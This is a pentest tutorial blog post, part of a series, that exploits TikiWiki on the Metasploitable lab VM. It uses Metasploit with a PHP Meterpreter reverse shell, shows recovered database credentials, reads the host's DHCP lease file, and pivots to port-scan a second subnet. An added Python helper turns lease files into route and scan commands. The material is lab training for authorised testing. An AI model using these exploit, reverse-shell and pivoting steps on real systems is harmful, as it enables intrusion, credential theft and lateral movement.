The following is based on my experiences and (limited) knowledge. I am not an expert in anything, nor will I likely ever be one. My hope is that this might help someone, somewhere, sometime. If nothing else, it might be a good start for discussion.
Preamble
This exercise is for educational use only, and is intended to be used in a lab environment, or as part of an authorized pentest. Please always ensure any scans or changes to systems are part of your pentest scope and comply with your rules of engagement.
This exercise is going to demonstrate how to use an "external" web application exploit, rather than a client-side exploit, to get the initial toehold, and it gives an introduction to the PHP Meterpreter.
Requirements and Background
Please review the previous posts. This exercise builds on some of the lessons learned.
Process
We start this post assuming that you have already done your recon and discovery to find a vulnerability that can be exploited. (always do recon first!)
This particular system has a vulnerability in the TikiWiki software. In fact, the server we are exploiting (the Metasploitable virtual machine available from metasploit.com) has multiple vulnerabilities.
msf > use exploit/unix/webapp/tikiwiki_graph_formula_exec
msf exploit(tikiwiki_graph_formula_exec) > set rhost 10.13.37.245
msf exploit(tikiwiki_graph_formula_exec) > set payload php/meterpreter/reverse_tcp
msf exploit(tikiwiki_graph_formula_exec) > exploit
[*] Started reverse handler on 10.13.37.136:80
[*] Attempting to obtain database credentials...
[*] The server returned : 200 OK
[*] Server version : Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
[*] TikiWiki database informations :
db_tiki : mysql
dbversion : 1.9
host_tiki : localhost
user_tiki : root
pass_tiki : root
dbs_tiki : tikiwiki195
[*] Attempting to execute our payload...
[*] Sending stage (29389 bytes) to 10.13.37.245
[*] Meterpreter session 3 opened (10.13.37.136:80 -> 10.13.37.245:47584) at 2010-11-03 18:57:55 -0400
Explanation - We told Metasploit to use the TikiWiki graph formula exploit with the PHP Meterpreter payload. The PHP Meterpreter is a payload rather than an exploit, and an impressive one: it implements many of the features of the standard Meterpreter inside the compromised web application's PHP process. Note that on the way in the module also recovered the TikiWiki database credentials (root / root), which are worth recording for later. See http://blog.metasploit.com/2010/06/meterpreter-for-pwned-home-pages.html for details on what is possible using the PHP Meterpreter.
Let's see what we got
meterpreter > sysinfo
Computer: metasploitable
OS : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
After some more looking around, here is what we find:
meterpreter > cat /var/lib/dhcp3/dhclient.leases
lease {
interface "eth1";
fixed-address 10.2.2.130;
option subnet-mask 255.255.255.0;
option dhcp-lease-time 1800;
option dhcp-message-type 5;
option domain-name-servers 10.2.2.1;
option dhcp-server-identifier 10.2.2.254;
option broadcast-address 10.2.2.255;
option domain-name "localdomain";
rebind 3 2010/11/3 23:34:00;
renew 3 2010/11/3 23:22:20;
expire 3 2010/11/3 23:37:45;
}
Excellent, there is a second NIC (eth1, 10.2.2.130) attached to a different network.
We can use the same route commands and scanners as in part 3 to explore the new network. Ctrl-Z (or the background command) drops back to the msf prompt while keeping the session alive, and the route goes through that session, so use the session number msfconsole reported when it opened (3 above).
meterpreter > <ctrl> <z>
msf exploit(tikiwiki_graph_formula_exec) > route add 10.2.2.0 255.255.255.0 3
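The step above (read the lease file, work out the network, hand it to route add) is easy to get wrong by hand when a host has several leases, so here is an added helper that is not part of the original post: it parses ISC dhclient.leases text, skips leases that have already expired, computes each network from the fixed address and subnet mask, and prints the matching msfconsole route add and rhosts lines. The lease text embedded in it is constructed from the output shown above; the session number is an assumption and should be whatever msfconsole reported for your Meterpreter session.

```python
"""
Added example (not from the original post): turn the pivot host's
dhclient.leases into the msfconsole route/scan commands used above.

Assumptions (mine, not the post's): the lease file uses the ISC dhclient
syntax shown in the post, the Meterpreter session id is known, and the
sample text below is constructed from the post's output.
"""
import ipaddress
import re
from datetime import datetime

# Constructed sample, copied from the lease block shown in the post.
SAMPLE_LEASES = """\
lease {
  interface "eth1";
  fixed-address 10.2.2.130;
  option subnet-mask 255.255.255.0;
  option dhcp-lease-time 1800;
  option dhcp-message-type 5;
  option domain-name-servers 10.2.2.1;
  option dhcp-server-identifier 10.2.2.254;
  option broadcast-address 10.2.2.255;
  option domain-name "localdomain";
  rebind 3 2010/11/3 23:34:00;
  renew 3 2010/11/3 23:22:20;
  expire 3 2010/11/3 23:37:45;
}
"""

LEASE_RE = re.compile(r"lease\s*\{(.*?)\}", re.S)
# One "key value;" line, with an optional leading "option" keyword.
FIELD_RE = re.compile(r"^\s*(?:option\s+)?([\w-]+)\s+(.*?);\s*$", re.M)


def parse_leases(text):
    """Return one dict per lease block, keyed by the bare field name."""
    leases = []
    for block in LEASE_RE.findall(text):
        fields = {}
        for key, value in FIELD_RE.findall(block):
            fields[key] = value.strip().strip('"')
        leases.append(fields)
    return leases


def lease_expiry(lease):
    """dhclient writes 'expire <weekday> YYYY/MM/DD HH:MM:SS' (UTC)."""
    _, stamp = lease["expire"].split(" ", 1)
    return datetime.strptime(stamp, "%Y/%m/%d %H:%M:%S")


def pivot_networks(text, session, now=None):
    """
    Map each distinct, unexpired lease to the network it reveals and the
    msfconsole commands needed to route through `session` and scan it.
    """
    seen = set()
    results = []
    for lease in parse_leases(text):
        if now is not None and lease_expiry(lease) < now:
            continue  # stale entry left over from an earlier lease
        addr = ipaddress.IPv4Address(lease["fixed-address"])
        net = ipaddress.IPv4Network((addr, lease["subnet-mask"]), strict=False)
        if net in seen:
            continue
        seen.add(net)
        results.append({
            "interface": lease["interface"],
            "address": str(addr),
            "network": str(net),
            "route_cmd": f"route add {net.network_address} {net.netmask} {session}",
            "scan_target": str(net),
        })
    return results


if __name__ == "__main__":
    # Session 3 is the number reported in the post's output; adjust to yours.
    for entry in pivot_networks(SAMPLE_LEASES, session=3):
        print(f"{entry['interface']} {entry['address']} -> {entry['network']}")
        print("  msf > " + entry["route_cmd"])
        print(f"  msf auxiliary(tcp) > set rhosts {entry['scan_target']}")
```

Feed it the lease text pulled back with cat or download. The scan target it emits is the whole subnet, which includes the pivot's own 10.2.2.130, so expect that address to appear in the scanner output as well.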
Because 10.2.2.130 is the web server's own address on eth1, we scan the rest of that subnet for other hosts:
msf exploit(tikiwiki_graph_formula_exec) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set rhosts 10.2.2.0/24
msf auxiliary(tcp) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS 10.2.2.0/24 yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout in milliseconds
VERBOSE false no Display verbose output
msf auxiliary(tcp) > set ports 135-139,445
msf auxiliary(tcp) > run
[*] 10.2.2.129:135 - TCP OPEN
[*] 10.2.2.129:139 - TCP OPEN
[*] 10.2.2.129:445 - TCP OPEN
Interesting note. In previous exercises I have typed exploit, not run. It turns out the proper convention is to use run for auxiliary modules and exploit for exploit modules, although for now exploit is aliased to run, so either works.
As before, we can now try some exploits against this new host, pivoting through the web server.
The end....again.....for now....